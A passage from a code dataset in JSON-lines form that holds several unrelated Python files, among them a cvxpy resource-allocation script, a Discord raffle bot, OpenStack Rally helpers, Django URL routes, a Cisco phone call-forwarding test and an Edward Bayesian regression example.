range(N_SERVICE):\n new = []\n for i in range(N_IAAS):\n if CHOICE[i,s]:\n new.append(i)\n I.append(new)\nr = cp.Variable((N_IAAS, N_SERVICE))\nu = cp.Variable((N_IAAS, N_SERVICE))\nd = cp.Variable((N_IAAS, N_SERVICE))\nrTotal = cp.Variable(N_SERVICE)\ndMax = cp.Variable(N_SERVICE)\n\nobj = 0\nconstraints = [ 0 <= r, 0 <= u, 0 <= dMax]\nfor s in range(N_SERVICE):\n if I[s]:\n rates = None\n for i in I[s]:\n IS[i, s] = True\n if not rates:\n rates = r[i,s]\n else:\n rates += r[i,s]\n constraints.append(r[i,s] <= ETA*u[i,s]*U[i]*C[i]/F[s])\n constraints.append(-cp.log(u[i,s]*U[i]*C[i]/F[s]-r[i,s]) - cp.log(d[i,s]-tau[i,s]) <= 0)\n constraints.append(d[i,s] <= dMax[s])\n constraints.append(rTotal[s] == rates)\n serviceObj = (cp.abs(rTotal[s]-R[s])) + 1e2*dMax[s]\n obj += serviceObj\n else:\n obj +=R[s]\nfor i in range(N_IAAS):\n if IS[i,:].any():\n constraints.append(cp.sum(u[i,IS[i,:]]) <= 1)\nobjective = cp.Minimize(obj)\nprob = cp.Problem(objective, constraints)\nprint(prob)\nresult = prob.solve(solver=\"ECOS\", verbose=True)\nprint(prob.status)\nprint(\"value:\", prob.value)\nprint(\"r:\", r.value)\nprint(\"u:\", u.value)\nprint(\"d:\", d.value)\nprint(\"D:\", dMax.value)\nprint(\"rT:\", rTotal.value)\nprint(\"R:\", R)\n","sub_path":"7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"629363736","text":"# // -- imports to make the bot work on discord -- //\nimport discord\nfrom discord.ext import commands\nimport asyncio\n# // -- import for database -- //\nimport sqlite3\n# // -- import for random decisions -- //\nimport random\n# // -- import the commonly used methods -- //\nimport Util\n\nclass Raffle(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n\n def make_total_raffle(self):\n total_raffle = list(Util.RAFFLE)\n for user in Util.DB_RAFFLE:\n total_raffle.append(user[0])\n return total_raffle\n\n def make_total_points(self,id):\n total_point = dict(Util.POINT)\n for user in Util.DB_POINT:\n if user[0] in total_point:\n total_point[user[0]] += user[1]\n else:\n total_point[user[0]] = user[1]\n if not (id in total_point):\n total_point[id] = 0\n return total_point\n\n @commands.command(name = 'clear_raffle')\n @Util.is_admin()\n async def clear_raffle(self, ctx,*, content = ''):\n await Util.log_command(self.bot,ctx,\"clear_raffle\")\n conn = sqlite3.connect('Database.db')\n c = conn.cursor()\n c.execute(\"DROP TABLE raffle_table;\")\n conn.commit()\n sql_cmd = open(\"SQL_CMDS/c-raffle_table.txt\",'r').read()\n c.execute(sql_cmd)\n conn.commit()\n c.execute(\"SELECT user_ID FROM raffle_table;\")\n Util.DB_RAFFLE = c.fetchall()\n conn.close()\n Util.RAFFLE = []\n await ctx.send(\"The database has been rest\")\n\n @commands.command(name = 'raffle_begins',\n aliases = ['raffle_begin'])\n @Util.is_admin()\n async def raffle_begins(self, ctx,*, content = ''):\n await Util.log_command(self.bot,ctx,\"raffle_begins\")\n if content == '':\n ctx.send(\"{} Please Make Sure To Give A Description Over The Winning Item\".format(ctx.author))\n return\n chnl = self.bot.get_channel(Util.RAFFLE_CHNL)\n embed = discord.Embed(title = \"React To This Message To Enter Into The Raffle!\",\n description = \"{}``` ```Each Ticket Entry Costs 3 Points, And You Are Allowed Up To 5 Entries!\".format(content),\n colour = random.randint(0,0xffffff)\n )\n embed.set_author(name = ctx.message.author, icon_url = ctx.message.author.avatar_url)\n msg = await chnl.send(embed = embed)\n await msg.add_reaction(\"\\U0001F39F\")\n await msg.pin()\n\n @commands.command(name = 'winner')\n @Util.is_admin()\n async def winner(self, ctx,*, content = ''):\n await Util.log_command(self.bot,ctx,\"winner\")\n total_raffle = self.make_total_raffle()\n chnl = self.bot.get_channel(Util.RAFFLE_CHNL)\n async for message in chnl.history(limit = 10):\n await message.clear_reactions()\n while True:\n try:\n win = total_raffle[random.randint(0,len(total_raffle)-1)]\n member = await ctx.guild.fetch_member(win)\n break\n except:\n continue\n embed = discord.Embed(title = \"The Raffle Is Done!\",\n description = \"{} is the winner of the raffle!\".format(member.mention),\n colour = random.randint(0,0xffffff))\n await chnl.send(embed = embed)\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n if not Util.is_raffle_chnl(payload):\n return\n if payload.user_id == self.bot.user.id:\n return\n await self.bot.http.remove_reaction(payload.channel_id, payload.message_id, payload.emoji, payload.user_id)\n\n total_raffle = self.make_total_raffle()\n total_point = self.make_total_points(payload.user_id)\n if total_raffle.count(payload.user_id) >= 5:\n return\n if total_point[payload.user_id] < 3:\n return\n\n if payload.user_id in Util.POINT:\n Util.POINT[payload.user_id] -= 3\n else:\n Util.POINT[payload.user_id] = (-1 * 3)\n\n chnl = self.bot.get_guild(433695004645523456).get_channel(Util.RAFFLE_CHNL)\n mylist = []\n async for msg in chnl.history(limit = 10):\n mylist.append(msg)\n mylist.pop(-1)\n if len(mylist) > 0:\n await chnl.delete_messages(mylist)\n total_raffle.append(payload.user_id)\n Util.RAFFLE.append(payload.user_id)\n emsg = ''\n overflow = 0\n color = random.randint(0,0xffffff)\n for i in total_raffle:\n try:\n user = await self.bot.get_guild(433695004645523456).fetch_member(i)\n except:\n continue\n emsg += ' ' + user.mention\n overflow += 1\n if overflow == 30:\n embed = discord.Embed(title = 'All The Tickets In The Hat!',\n description = emsg,\n colour = color\n )\n await chnl.send(embed = embed)\n emsg = ''\n overflow = 0\n if emsg != '':\n embed = discord.Embed(title = 'All The Tickets In The Hat!',\n description = emsg,\n colour = color\n )\n await chnl.send(embed = embed)\n\n\n\ndef setup(bot):\n bot.add_cog(Raffle(bot))\n","sub_path":"Raffle.py","file_name":"Raffle.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"294383234","text":"# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport abc\nimport operator\nimport re\n\nfrom rally import exceptions\n\n\ndef set(**kwargs):\n \"\"\"Decorator to define resource transformation(s) on scenario parameters.\n\n The `kwargs` passed as arguments to the decorator are used to\n map a key in the scenario config to the subclass of ResourceType\n used to perform a transformation on the value of that key.\n \"\"\"\n def wrapper(func):\n func.preprocessors = getattr(func, 'preprocessors', {})\n func.preprocessors.update(kwargs)\n return func\n return wrapper\n\n\nclass ResourceType(object):\n\n @classmethod\n @abc.abstractmethod\n def transform(cls, clients, resource_config):\n \"\"\"Transform the resource.\n\n :param clients: openstack admin client handles\n :param resource_config: scenario config of resource\n\n :returns: transformed value of resource\n \"\"\"\n\n\ndef _id_from_name(resource_config, resources, typename):\n \"\"\"Return the id of the resource whose name matches the pattern.\n\n When resource_config contains `name`, an exact match is used.\n When resource_config contains `regex`, a pattern match is used.\n\n An `InvalidScenarioArgument` is thrown if the pattern does\n not match unambiguously.\n\n :param resource_config: resource to be transformed\n :param resources: iterable containing all resources\n :param typename: name which describes the type of resource\n\n :returns: resource id uniquely mapped to `name` or `regex`\n \"\"\"\n if resource_config.get('name'):\n patternstr = \"^{0}$\".format(resource_config.get('name'))\n elif resource_config.get('regex'):\n patternstr = resource_config.get('regex')\n else:\n raise exceptions.InvalidScenarioArgument(\n \"{typename} 'id', 'name', or 'regex' not found \"\n \"in '{resource_config}' \".format(typename=typename.title(),\n resource_config=resource_config))\n\n pattern = re.compile(patternstr)\n matching = filter(lambda resource: re.search(pattern, resource.name),\n resources)\n if not matching:\n raise exceptions.InvalidScenarioArgument(\n \"{typename} with pattern '{pattern}' not found\".format(\n typename=typename.title(), pattern=pattern.pattern))\n elif len(matching) > 1:\n raise exceptions.InvalidScenarioArgument(\n \"{typename} with name '{pattern}' is ambiguous, possible matches \"\n \"by id: {ids}\".format(typename=typename.title(),\n pattern=pattern.pattern,\n ids=\", \".join(map(operator.attrgetter(\"id\"),\n matching))))\n return matching[0].id\n\n\nclass FlavorResourceType(ResourceType):\n\n @classmethod\n def transform(cls, clients, resource_config):\n \"\"\"Transform the resource config to id.\n\n :param clients: openstack admin client handles\n :param resource_config: scenario config with `id`, `name` or `regex`\n\n :returns: id matching resource\n \"\"\"\n resource_id = resource_config.get('id')\n if not resource_id:\n novaclient = clients.nova()\n resource_id = _id_from_name(resource_config=resource_config,\n resources=novaclient.flavors.list(),\n typename='flavor')\n return resource_id\n\n\nclass ImageResourceType(ResourceType):\n\n @classmethod\n def transform(cls, clients, resource_config):\n \"\"\"Transform the resource config to id.\n\n :param clients: openstack admin client handles\n :param resource_config: scenario config with `id`, `name` or `regex`\n\n :returns: id matching resource\n \"\"\"\n resource_id = resource_config.get('id')\n if not resource_id:\n glanceclient = clients.glance()\n resource_id = _id_from_name(resource_config=resource_config,\n resources=glanceclient.images.list(),\n typename='image')\n return resource_id\n","sub_path":"rally/benchmark/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"37949761","text":"\"\"\"\n Tests Regrade\n\"\"\"\n\nfrom time import sleep\nimport discord\n\n\nasync def test(testing_bot, guild_id):\n\n \"\"\"\n Function: test\n Description: runs each test\n Inputs:\n - testing_bot: bot that sends commands to test TeachersPetBot\n - guild_id: id of the guild that is using the TeachersPetBot\n Outputs: None\n \"\"\"\n await test_regrade_request(testing_bot)\n await test_update_request(testing_bot)\n await test_display_requests(testing_bot)\n await test_remove_request(testing_bot)\n\n\nasync def test_regrade_request(testing_bot):\n\n \"\"\"\n Function: test_regrade_request\n Description: tests regrade-request command\n Inputs:\n - testing_bot: bot that sends commands to test TeachersPetBot\n Outputs: None\n \"\"\"\n\n print('testing regrade request')\n regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')\n await regrade_channel.send('!regrade-request \"Student 1\" q1,q2,q3')\n sleep(5.0)\n messages = await regrade_channel.history(limit=1).flatten()\n\n for m in messages:\n new_request = \"STUDENT 1's regrade request successfully submitted\" in m.content\n duplicate_request = \"Duplicate regrade request.Use !regrade-update command to make updates to request\"\n assert (new_request or duplicate_request)\n\n\nasync def test_update_request(testing_bot):\n\n \"\"\"\n Function: test_update_request\n Description: tests update-request command\n Inputs:\n - testing_bot: bot that sends commands to test TeachersPetBot\n Outputs: None\n \"\"\"\n print('testing update request')\n regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')\n await regrade_channel.send('!update-request \"Student 1\" q4,q5,q6')\n sleep(5.0)\n messages = await regrade_channel.history(limit=1).flatten()\n\n for m in messages:\n assert \"STUDENT 1's regrade request updated successfully\" in m.content\n\n\nasync def test_display_requests(testing_bot):\n\n \"\"\"\n Function: test_display_requests\n Description: tests display-requests command\n Inputs:\n - testing_bot: bot that sends commands to test TeachersPetBot\n Outputs: None\n \"\"\"\n print('testing display requests')\n regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')\n await regrade_channel.send('!display-requests')\n sleep(5.0)\n messages = await regrade_channel.history(limit=1).flatten()\n\n for m in messages:\n assert 'STUDENT 1 q4,q5,q6' in m.content\n\n\nasync def test_remove_request(testing_bot):\n\n \"\"\"\n Function: test_remove_request\n Description: tests remove-request command\n Inputs:\n - testing_bot: bot that sends commands to test TeachersPetBot\n Outputs: None\n \"\"\"\n print('testing remove request')\n regrade_channel = discord.utils.get(testing_bot.get_all_channels(), name='regrade-requests')\n await regrade_channel.send('!remove-request \"Student 1\" q4,q5,q6')\n sleep(5.0)\n messages = await regrade_channel.history(limit=1).flatten()\n\n for m in messages:\n assert \"STUDENT 1's regrade request removed successfully\" in m.content\n","sub_path":"test/test_regrade.py","file_name":"test_regrade.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"370810532","text":"from django.conf.urls import url\n\nfrom info.filter import SkillFilter\nfrom info.forms import LoginForm\nfrom info.views import *\nfrom django.contrib.auth import views\n\nworker_url = [\n url(r'skill/create/$',SkillCreate.as_view(),name='createskill'),\n url(r'skill/$',SkillListView.as_view(),name='skillliist'),\n url(r'skill/delete/(?P\\d+)/$',DeleteSkillView.as_view(),name='skilldelete'),\n url(r'skill/update/(?P\\d+)/$',SkillUpdate.as_view(),name='skillupdate'),\n url(r'^workerprofile/$', CreateProfile.as_view(), name='workerprofile'),\n]\n\n\nurlpatterns = [\n\n url(r'^$', home, name='home'),\n url(r'^registeration/', register, name='register'),\n url(r'^activate/(?P[0-9A-Za-z_\\-]+)/(?P[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',\n activate, name='activate'),\n url(r'^login/',loginuser, name='login'),\n url(r'^profile/$', GetProfile.as_view(),name = 'profile' ),\n url(r'^contractorprofile/$', CreateContractorProfile.as_view(), name='contractorprofile'),\n url(r'^aboutus/',aboutus, name='aboutus'),\n url(r'^contactus/',contactus, name='contactus'),\n url(r'^logout/$',views.logout, {'next_page': '/login'},name='logout'),\n url(r'worker-hire/$',WorkerSkillListView.as_view(),name='worker_skill_list'),\n url(r'^worker-hire/(?P\\d+)/$',HireWorkerView.as_view(),name='worker_hire'),\n url(r'^hired-request/', HireRequestList.as_view(),name='hired_request'),\n url(r'^confirm-hire/(?P\\d+)/$',confirm_hire_worker, name='confirm-hire'),\n\n\n] + worker_url","sub_path":"info/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"318027269","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 16 11:09:58 2020\n\n@author: YingliLou\n\"\"\"\nimport numpy as np\nimport csv\n\nclimate = ['1A','2A','2B','3A','3B','3C','4A','4B','4C','5A','5B','6A','6B','7A','8A']\nsensitivity=['fa','mo','SA_GAM_','SA_LIN_REG_','SA_RP_REG_','SA_RS_REG_','so']\nnum_var=11\n\nsensitivity_results=[]\nfor i in range (len(climate)): #len(climate)\n results1=[]\n results2=[]\n for j in range (len(sensitivity)): #len(sensitivity)\n data_set_temp = np.genfromtxt('./results/sensitive/sensitivity_'+sensitivity[j]+'.csv',dtype=str,delimiter=',')\n var=[None]*num_var\n temp=[]\n for row in data_set_temp:\n if row[0] == climate[i]:\n temp.append(row[3])\n sensitive_value=1\n temp=np.array(temp)\n temp=np.argsort(temp)\n value=1\n for k in range(num_var):\n var[temp[k]]=value\n value +=1\n results1.append(var)\n for j in range (num_var):\n temp=0\n for k in range(len(sensitivity)):\n temp += float(results1[k][j])\n temp=temp/len(sensitivity)\n results2.append(temp)\n sensitivity_results.append(results2)\n \nsensitivity_results=tuple(zip(*sensitivity_results))\n \nwith open('./sensitivity_results.csv', 'wb') as csvfile:\n for row in sensitivity_results:\n data = csv.writer(csvfile, delimiter=',')\n data.writerow(row)\n \n \n \n \n \n \n \n ","sub_path":"sensitivity.py","file_name":"sensitivity.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"445000092","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nScript Header\n\n$Id: cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration\n\nCopyright (c) 2016 Cisco Systems, Inc.\n\nName:\n cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py\n\nPurpose:\n This test case verifies the synchronization of configuration of\n the Call Forward Always feature between the DUT and BroadWorks\n on shared line.\n\nAuthor:\n Yashashwini M B(ymuddena@cisco.com)\nModified:\n Sushmita roy(sushroy@cisco.com)\n\nReferences:\n US26459\n BW-SIPPhone-FunctionalTestPlan-R21.0\n\nDescription:\n Activate the Call Forward Always feature from the DUT and provide a\n forward-to number. Deactivate from the BroadWorks provisioning portal.\n Activate the Call Forward Always feature from the BroadWorks portal\n and provide a different forward-to number. Deactivate from the phone.\n\nTopology:\n 1. 4 3pcc phone\n 2. 2 Phones should register successfully with shared line.\n\nPass/Fail Criteria:\n Synchronization of configuration of the Call Forward Always feature\n between the DUT and BroadWorks on shared line.\n\nTest Steps:\n 1. Configure the primary DUT phone to register a shared line as instructed\n in the general test setup instructions\n 2. Configure the alternate DUT phone with a shared line matching the AoR\n for the BroadWorks users SCA as instructed in the general test setup\n instructions.\n 3. Activate the Call Forward Always feature from the DUT and provide a\n forward-to number.\n 4. Deactivate from the BroadWorks provisioning portal.\n 5. Activate the Call Forward Always feature from the BroadWorks portal\n and provide a different forward-to number.\n 6. Deactivate from the phone.\n Verify:\n 1. Activate Call Forward Always on the DUT 1 phone and provide a\n forward-to number.\n 1. DUT 1 shows Call Forward Always activated with forward-to number.\n 2. BroadWorks provisioning portal shows Call Forward Always\n activated with forward-to-number for the DUT 1 user.\n 2. Deactivate Call Forward Always from the BroadWorks provisioning portal.\n 1. DUT 1 shows Call Forward Always deactivated.\n 2. BroadWorks provisioning portal shows Call Forward Always\n deactivated for the DUT 1 user.\n 3. Activate Call Forward Always from the BroadWorks provisioning portal\n and provide a forward-to-number.\n 1. DUT 1 shows Call Forward Always activated with forward-to number.\n 2. BroadWorks provisioning portal shows Call Forward Always activated\n with forward-to-number for the DUT 1 user.\n 4. Deactivate Call Forward Always on the DUT 1 phone.\n 1. DUT 1 shows Call Forward Always deactivated.\n 2. BroadWorks provisioning portal shows Call Forward Always\n deactivated for the DUT 1 user.\n\n\n Notes:\n\n Known Bugs:\n\"\"\"\n\nimport tng\nimport logging\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng.frontend.timing import until\nfrom tng.frontend.timing import wait\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\n\nlog = logging.getLogger('SLCallForwardAlwaysConfiguration')\n\n\nclass SLCallForwardAlwaysConfiguration(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (\n PhoneConfigHelper, BroadsoftLoginHelper, PhoneLineRegHelper,\n TsharkHelper)\n helper_num_devices = 4\n\n def setUp(self):\n log.info(\"Start of setUp\")\n self.broadsoft = BroadsoftConfig()\n self.xsi_user_id1 = self.toolkit.get_test_env_info(\n section='bsoft', parameter_name=\"xsi_user_id1\")\n self.shared_userID = '{}{}'.format(self.user_id1, 'a')\n self.device_type = 'Cisco-Hybrid{}'.format(\n self.oPhone1.get_web_status('Product_Name')[2:])\n self.product_model = self.oPhone1.get_web_status('Product_Name')\n\n log.info(\"Check Cfwd_always initial state on server\")\n cfwd_always_initial_state =\\\n self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n\n if 'true' in cfwd_always_initial_state:\n log.info(\"Disable Cfwd_always on server\")\n self.broadsoft.set_call_forward_type(\n 'CallForwardingAlways', active='false',\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n log.info(\"Check Cfwd_always is disabled on server\")\n verify_cfwd_always = self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.assertEqual(\"false\", verify_cfwd_always)\n\n def broadsoft_cleanup():\n log.info(\"Disable Cfwd_always on server\")\n self.broadsoft.set_call_forward_type(\n 'CallForwardingAlways', active='false',\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n log.info(\"verify cfwd_always disabled on both phone and server\")\n until(\n self.verify_cfwd_always_disable, desired_result=\"Off\",\n timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\")\n\n self.addCleanup(broadsoft_cleanup)\n\n # Configure Shared line on broadsoft server\n self.shared_name = self.bsoft_web.configure_shared_line(\n shared_number=self.shared_userID,\n device_type=self.device_type, user_phone_num=self.user_id1)\n\n def delete_sharedline():\n log.info(\"Delete configured Shared line\")\n self.bsoft_web.delete_shared_line(\n user_phone_num=self.user_id1, shared_name=self.shared_name)\n\n self.addCleanup(delete_sharedline)\n\n log.info(\"End of setUp\")\n\n def test_sl_call_forward_always_configuration(self):\n log.info(\"Start of test_sl_call_forward_always_configuration\")\n\n log.info(\"Set shared line on phone1, phone2\")\n for (diff_phones, user_id, shared_userid) in (\n (self.oPhone1, self.user_id1, ''),\n (self.oPhone2, self.shared_userID, self.shared_userID)):\n self.shared_config(\n diff_phones, user_id, shared_userid)\n wait(3, 'Wait for 5 Seconds')\n\n log.info('Start tshark on linux')\n filter_cmd = 'port sip and host {} or host {}'.format(\n self.oPhone1.ip, self.oPhone2.ip)\n self.tshark.tshark_start(filter_cmd)\n\n log.info(\"Enable Feature Key sync in Phone webpage\")\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n line=1, set_enabled=1, fks_enable_disable=True, dfks_update=False)\n\n log.info(\n \"From Phone1, set Call Forward Always to forward to {}\".format(\n self.user_id3))\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n fwdastatus=1, fwdadn='{}'.format(self.user_id3),\n fks_enable_disable=False, dfks_update=True)\n\n log.info(\"verify cfwd_always enabled on both phone and server\")\n until(\n self.verify_cfwd_always_enable, desired_result=\"true\",\n timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not enabled\")\n\n log.info(\"Disable Cfwd_always on server\")\n self.broadsoft.set_call_forward_type(\n 'CallForwardingAlways', active='false',\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1)\n\n log.info(\"verify cfwd_always disabled on both phone and server\")\n until(\n self.verify_cfwd_always_disable, desired_result=\"Off\",\n timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\")\n\n log.info(\"Enable Cfwd_always on server to forward to {}\".format(\n self.user_id4))\n self.broadsoft.set_call_forward_type(\n 'CallForwardingAlways', active='true',\n user_id_proxy=self.xsi_user_id1, user_id=self.user_id1,\n forward_to_phone_num=self.user_id4)\n\n log.info(\"verify cfwd_always enabled on both phone and server\")\n until(\n self.verify_cfwd_always_enable, desired_result=\"true\",\n timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not enabled\")\n\n log.info(\"Disable CfwdAlways on phone\")\n self.oPhone1.enable_disable_fks_and_send_dfks_update(\n 0, 0, '', 0, '', 0, '', fks_enable_disable=False,\n dfks_update=True)\n\n log.info(\"verify cfwd_always disabled on both phone and server\")\n until(\n self.verify_cfwd_always_disable, desired_result=\"false\",\n timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\")\n\n log.info(\"End of test_call_forward_always_configuration\")\n\n def shared_config(self, diff_phones, user_id, shared_userid=''):\n log.info(\"Configuring shared line on phone1 and phone2\")\n\n diff_phones.ui.set_web_parameter_http(\n Share_Ext_1=['Ext 1', 'Share Line Appearance', 'Share Ext', 1],\n User_ID_1=['Ext 1', 'Subscriber Information', 'User ID', user_id],\n Call_Park_Monitor_Enable_1_=[\n 'Ext 1', 'Call Park Monitor Enable', 1],\n Shared_User_ID=[\n 'Ext 1', 'Share Line Appearance', 'Shared User ID',\n shared_userid],\n Share_Call_Appearance_1=[\n 'Phone', 'Line Key 1', 'Share Call Appearance', ' shared'])\n\n appearance1, shared_ext1, user1, monitor_enable1 = (\n diff_phones.get_web_config(\n 'Share_Call_Appearance_1_', 'Share_Ext_1_', 'User_ID_1_',\n 'Call_Park_Monitor_Enable_1_'))\n shared_user_id = diff_phones.ui.get_web_parameter_http(\n 'Ext 1', 'Shared User ID')\n\n self.assertEqual(\"Yes\", monitor_enable1)\n self.assertEqual(\"shared\", appearance1)\n self.assertEqual(\"Yes\", shared_ext1)\n self.assertEqual(shared_userid, shared_user_id)\n self.assertEqual(user_id, user1)\n log.info(\"Shared line configuration on all phones completed\")\n\n def verify_cfwd_always_enable(self):\n log.info(\"Check Cfwd_always is enabled on Phone\")\n if '7832' not in self.product_model:\n until(\n self.verify_cfwd_always_on_phone, timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\",\n args=(self.oPhone1, 'SK_NCFWD'))\n\n log.info(\"Check Cfwd_always is enabled on server\")\n self.verify_cfwd_always = self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.assertEqual(\"true\", self.verify_cfwd_always)\n\n def verify_cfwd_always_disable(self):\n log.info(\"Check Cfwd_always is disabled on Phone\")\n if '7832' not in self.product_model:\n until(\n self.verify_cfwd_always_on_phone, timeout=30, interval=5,\n raise_msg=\"Phone1 cfwd_always is not disabled\",\n args=(self.oPhone1, 'SK_CFWD'))\n\n log.info('Verify Cfwd always is disabled in server')\n cfwd_always_status = self.broadsoft.get_call_forward_type_status(\n 'CallForwardingAlways', user_id_proxy=self.xsi_user_id1,\n user_id=self.user_id1)\n self.assertEqual(\"false\", cfwd_always_status)\n\n def verify_cfwd_always_on_phone(self, phone, cfwd_skey):\n resp = phone.ccapi.get_mphone_state('GET_SOFTKEYS')\n for skey in resp:\n skey = skey.split(':')\n if cfwd_skey in skey:\n log.info('{} is present on phone {}'.format(cfwd_skey, phone))\n return True\n\n\n# this is called by 'tng run'\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Functional/cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py","file_name":"cmCC26459_3pcc_BS_Functional_229_SLCallForwardAlwaysConfiguration.py","file_ext":"py","file_size_in_byte":12157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"250692056","text":"#!/usr/bin/env python\n\"\"\"Bayesian linear regression. Inference uses data subsampling and\nscales the log-likelihood.\n\nOne local optima is an inferred posterior mean of about [-5.0 5.0].\nThis implies there is some weird symmetry happening; this result can\nbe obtained by initializing the first coordinate to be negative.\nSimilar occurs for the second coordinate.\n\nNote as with all GAN-style training, the algorithm is not stable. It\nis recommended to monitor training and halt manually according to some\ncriterion (e.g., prediction accuracy on validation test, quality of\nsamples).\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward as ed\nimport numpy as np\nimport tensorflow as tf\n\nfrom edward.models import Normal\nfrom tensorflow.contrib import slim\n\n\ndef build_toy_dataset(N, w, noise_std=0.1):\n D = len(w)\n x = np.random.randn(N, D).astype(np.float32)\n y = np.dot(x, w) + np.random.normal(0, noise_std, size=N)\n return x, y\n\n\ndef ratio_estimator(data, local_vars, global_vars):\n \"\"\"Takes as input a dict of data x, local variable samples z, and\n global variable samples beta; outputs real values of shape\n (x.shape[0] + z.shape[0],). In this example, there are no local\n variables.\n \"\"\"\n # data[y] has shape (M,); global_vars[w] has shape (D,)\n # we concatenate w to each data point y, so input has shape (M, 1 + D)\n input = tf.concat([\n tf.reshape(data[y], [M, 1]),\n tf.tile(tf.reshape(global_vars[w], [1, D]), [M, 1])], 1)\n hidden = slim.fully_connected(input, 64, activation_fn=tf.nn.relu)\n output = slim.fully_connected(hidden, 1, activation_fn=None)\n return output\n\n\ndef next_batch(size, i):\n diff = (i + 1) * size - X_train.shape[0]\n if diff <= 0:\n X_batch = X_train[(i * size):((i + 1) * size), :]\n y_batch = y_train[(i * size):((i + 1) * size)]\n i = i + 1\n else:\n X_batch = np.concatenate((X_train[(i * size):, :], X_train[:diff, :]))\n y_batch = np.concatenate((y_train[(i * size):], y_train[:diff]))\n i = 0\n\n return X_batch, y_batch, i\n\n\ned.set_seed(42)\n\nN = 500 # number of data points\nM = 50 # batch size during training\nD = 2 # number of features\n\n# DATA\nw_true = np.ones(D) * 5.0\nX_train, y_train = build_toy_dataset(N, w_true)\nX_test, y_test = build_toy_dataset(N, w_true)\n\n# MODEL\nX = tf.placeholder(tf.float32, [M, D])\ny_ph = tf.placeholder(tf.float32, [M])\nw = Normal(mu=tf.zeros(D), sigma=tf.ones(D))\ny = Normal(mu=ed.dot(X, w), sigma=tf.ones(M))\n\n# INFERENCE\nqw = Normal(mu=tf.Variable(tf.random_normal([D]) + 1.0),\n sigma=tf.nn.softplus(tf.Variable(tf.random_normal([D]))))\n\ninference = ed.ImplicitKLqp(\n {w: qw}, data={y: y_ph},\n discriminator=ratio_estimator, global_vars={w: qw})\ninference.initialize(n_iter=5000, n_print=100, scale={y: float(N) / M})\n\nsess = ed.get_session()\ntf.global_variables_initializer().run()\n\ni = 0\nfor _ in range(inference.n_iter):\n X_batch, y_batch, i = next_batch(M, i)\n for _ in range(5):\n info_dict_d = inference.update(\n variables=\"Disc\", feed_dict={X: X_batch, y_ph: y_batch})\n\n info_dict = inference.update(\n variables=\"Gen\", feed_dict={X: X_batch, y_ph: y_batch})\n info_dict['loss_d'] = info_dict_d['loss_d']\n info_dict['t'] = info_dict['t'] // 6 # say set of 6 updates is 1 iteration\n\n t = info_dict['t']\n inference.print_progress(info_dict)\n if t == 1 or t % 